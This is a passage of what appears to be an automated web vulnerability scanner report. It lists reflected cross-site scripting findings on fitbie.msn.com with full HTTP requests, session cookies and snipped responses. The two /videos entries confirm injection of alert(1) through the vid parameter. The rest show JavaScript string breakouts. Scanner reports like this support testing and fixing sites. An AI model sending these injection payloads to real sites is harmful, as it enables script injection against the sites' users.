Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:32 +0000
ETag: "1297607192-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:33 GMT
Date: Sun, 13 Feb 2011 14:26:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default14ef8';e86b01acd7a?destination=node%2Fdefault14ef8';e86b01acd7a&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.114. http://fitbie.msn.com/sites/default/files/yoga-strength-move-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/yoga-strength-move-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4626'%3b35eade3c06e was submitted in the REST URL parameter 2. This input was echoed as c4626';35eade3c06e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultc4626'%3b35eade3c06e/files/yoga-strength-move-th.jpg?1294859816 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:57 +0000
ETag: "1297607397-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:57 GMT
Date: Sun, 13 Feb 2011 14:29:57 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultc4626';35eade3c06e?destination=node%2Fdefaultc4626';35eade3c06e&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.115. http://fitbie.msn.com/slideshow/10-grab-and-go-fitness-foods [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/slideshow/10-grab-and-go-fitness-foods

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4043'%3bfb9ffbe10af was submitted in the REST URL parameter 2. This input was echoed as a4043';fb9ffbe10af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /slideshow/10-grab-and-go-fitness-foodsa4043'%3bfb9ffbe10af HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:23 +0000
ETag: "1297607723-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:23 GMT
Date: Sun, 13 Feb 2011 14:35:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/10-grab-and-go-fitness-foodsa4043';fb9ffbe10af?destination=node%2F10-grab-and-go-fitness-foodsa4043';fb9ffbe10af&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.116. http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/slideshow/12-ways-make-water-less-boring

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4fc4'%3bf93e0f8f12d was submitted in the REST URL parameter 2. This input was echoed as f4fc4';f93e0f8f12d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /slideshow/12-ways-make-water-less-boringf4fc4'%3bf93e0f8f12d HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Fri, 11 Feb 2011 21:09:58 +0000
ETag: "1297458598-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Fri, 11 Feb 2011 22:09:58 GMT
Date: Fri, 11 Feb 2011 21:09:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/12-ways-make-water-less-boringf4fc4';f93e0f8f12d?destination=node%2F12-ways-make-water-less-boringf4fc4';f93e0f8f12d&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.117. http://fitbie.msn.com/taxonomy/term/117 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/taxonomy/term/117

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23170'%3b7f42a6aeb2c was submitted in the REST URL parameter 2. This input was echoed as 23170';7f42a6aeb2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /taxonomy/term23170'%3b7f42a6aeb2c/117 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_calories?height_1='&height_2='&h_unit=0&weight='&w_unit=1&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:01 +0000
ETag: "1297607761-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43199
Expires: Mon, 14 Feb 2011 02:36:01 GMT
Date: Sun, 13 Feb 2011 14:36:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/term23170';7f42a6aeb2c?destination=node%2Fterm23170';7f42a6aeb2c&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.118. http://fitbie.msn.com/user/login [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/user/login

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b63b9'%3ba65ecff8ac9 was submitted in the REST URL parameter 2. This input was echoed as b63b9';a65ecff8ac9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /user/loginb63b9'%3ba65ecff8ac9 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:53 +0000
ETag: "1297607813-1"
Content-Type: text/html; charset=utf-8
Expires: Sun, 13 Feb 2011 14:36:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:36:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/loginb63b9';a65ecff8ac9?destination=node%2Floginb63b9';a65ecff8ac9&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.119. http://fitbie.msn.com/videos [vid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/videos

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec297"%3balert(1)//7610d283477 was submitted in the vid parameter. This input was echoed as ec297";alert(1)//7610d283477 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /videos?vid=ec297"%3balert(1)//7610d283477 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:08 +0000
ETag: "1297607828-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43200
Expires: Mon, 14 Feb 2011 02:37:08 GMT
Date: Sun, 13 Feb 2011 14:37:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
'CustomPlayer', 950, 980, {"configCsid": "Rodale", "configName": "Rodale_Home-Health_Hub", "player.linkoverride": "http://fitbie.msn.com/videos/?vid=", "player.ap": "true", "player.c":"v","player.v": "ec297";alert(1)//7610d283477","gallery.linkback": "http://fitbie.msn.com/videos", "gallery.linkbackText": "More videos from Fitbie" }, 'CustomPlayer1');</script>
...[SNIP]...

1.120. http://fitbie.msn.com/videos/ [vid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/videos/

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5226"%3balert(1)//408672e6c4f was submitted in the vid parameter. This input was echoed as b5226";alert(1)//408672e6c4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /videos/?vid=b5226"%3balert(1)//408672e6c4f HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:19 +0000
ETag: "1297607839-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43200
Expires: Mon, 14 Feb 2011 02:37:20 GMT
Date: Sun, 13 Feb 2011 14:37:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
'CustomPlayer', 950, 980, {"configCsid": "Rodale", "configName": "Rodale_Home-Health_Hub", "player.linkoverride": "http://fitbie.msn.com/videos/?vid=", "player.ap": "true", "player.c":"v","player.v": "b5226";alert(1)//408672e6c4f","gallery.linkback": "http://fitbie.msn.com/videos", "gallery.linkbackText": "More videos from Fitbie" }, 'CustomPlayer1');</script>
...[SNIP]...

1.121. http://fitbie.msn.com/weight-loss-basics/tips/6-happiest-ways-beat-belly-fat [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/weight-loss-basics/tips/6-happiest-ways-beat-belly-fat

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e60e'%3bb39761af491 was submitted in the REST URL parameter 2. This input was echoed as 9e60e';b39761af491 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /weight-loss-basics/tips9e60e'%3bb39761af491/6-happiest-ways-beat-belly-fat HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
